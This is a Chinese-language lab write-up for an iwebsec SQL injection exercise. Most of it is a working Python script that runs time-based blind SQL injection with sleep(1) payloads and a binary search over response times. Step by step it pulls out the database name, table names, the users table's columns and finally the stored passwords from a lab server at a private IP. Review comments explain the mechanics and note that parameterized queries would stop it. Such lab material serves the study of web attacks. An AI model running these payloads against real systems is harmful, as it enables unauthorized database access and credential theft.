目录
一、解题过程
(一)观察页面
发现不论输入的 payload 正确与否，页面输出都是一样的，所以无法使用布尔盲注，只能依靠响应时间（时间盲注）来判断。
(二)编写脚本逐项获取数据
1.获取数据库名的长度(可不做)
#encoding=utf-8
import requests
import os
import time
# Lab endpoint the whole script talks to; every probe below appends a query
# string whose `id` value carries the injected if(...,sleep(1),1) expression.
# NOTE(review): the timing side channel exists only because 04.php evidently
# concatenates `id` into its SQL; a parameterized statement would make every
# branch return in the same time and the script would recover nothing.
url="http://192.168.182.130:8001/sqli/04.php"
def DbLen():
# Guess the length of the current database name (1..9) from response latency.
# The page body is identical for every guess (see the observation above), so the
# only observable is wall-clock time: the server sleeps 1s when the guess is right.
# Prints one line per matching length; returns None.
for i in range(1,10):
payload="?id=if(length(database())={},sleep(1),1)--+".format(i)
req_url=url+payload
start_time=time.time()
rep=requests.get(url=req_url)   # NOTE(review): the response body is never read, only the elapsed time
end_time = time.time()
t = end_time - start_time
# The threshold equals the sleep duration itself, so any request that is slow
# for another reason (network, server load) is also counted as a hit.
if t > 1:
print("DB length is "+str(i))
DbLen()  # step 1 of the writeup; runs at import time, script style
2.获取数据库名(可不做)
def DbName():
# Recover the current database name one character at a time (positions 1..7).
# Each position is found by a binary search over the code-point range [32, 130):
# the server sleeps when ord(char) > mid, so a slow response raises the lower
# bound and a fast one lowers the upper bound until they meet on ord(char).
# NOTE(review): the position count is hard-coded; presumably it matches the
# length found by DbLen() -- confirm against that output.
result=""
for i in range(1,8):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)   # NOTE(review): response body unused; only timing is read
end_time = time.time()
t = end_time - start_time
# Same 1s threshold as DbLen(): a slow response is interpreted as "greater than mid".
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
# Loop exits with l == r, and the trailing recompute leaves mid == l: the
# recovered code point for this position.
result=result+chr(mid)
print("the result is {}".format(result))
DbName()  # step 2 of the writeup; prints the name after each recovered character
3.获取表名
def TablesName():
# Recover the comma-separated list of table names in the current schema
# (group_concat collapses them into one value) for positions 1..49, using the
# same per-character binary search on response latency as DbName().
# NOTE(review): 49 is a hard-coded bound -- a longer list is silently truncated.
# Positions past the end of the value presumably yield ord() == 0 (MySQL semantics
# for an empty string), which never sleeps, so the search settles on 32 (a space).
result=""
for i in range(1,50):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=if(ord(mid((select group_concat(table_name)
from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)   # NOTE(review): response body unused; only timing is read
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
# After the loop mid == l == r, the code point recovered for position i.
result=result+chr(mid)
print("the result is {}".format(result))
TablesName()  # step 3 of the writeup
4.获取users表的列名
def ColumnsName():
# Recover the comma-separated column list of the `users` table in the current
# schema (positions 1..29), character by character via the latency binary search.
# The table name is hard-coded from the result of TablesName().
# NOTE(review): 29 is a hard-coded bound; longer column lists are truncated.
result=""
for i in range(1,30):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload='''?id=if(ord(mid((select group_concat(column_name)
from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)   # NOTE(review): response body unused; only timing is read
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
# After the loop mid == l == r, the code point recovered for position i.
result=result+chr(mid)
print("the result is {}".format(result))
ColumnsName()  # step 4 of the writeup
5.获取password列的数据
def GetData():
# Recover the group_concat of the `password` column of `iwebsec.users`
# (positions 1..49) with the same per-character latency binary search.
# NOTE(review): unlike the earlier steps, the schema name is hard-coded here
# instead of using database(); presumably `iwebsec` is what DbName() printed.
# As above, 49 is a fixed bound and longer values are truncated.
result=""
for i in range(1,50):
l = 32
r = 130
mid = (l + r) >> 1
while (l < r):
payload="?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i,mid)
req_url=url+payload
#print(req_url)
start_time=time.time()
rep=requests.get(url=req_url)   # NOTE(review): response body unused; only timing is read
end_time = time.time()
t = end_time - start_time
if t > 1:
l = mid +1
else:
r = mid
mid = (l + r)>>1
# After the loop mid == l == r, the code point recovered for position i.
result=result+chr(mid)
print("the result is {}".format(result))
GetData()  # step 5 of the writeup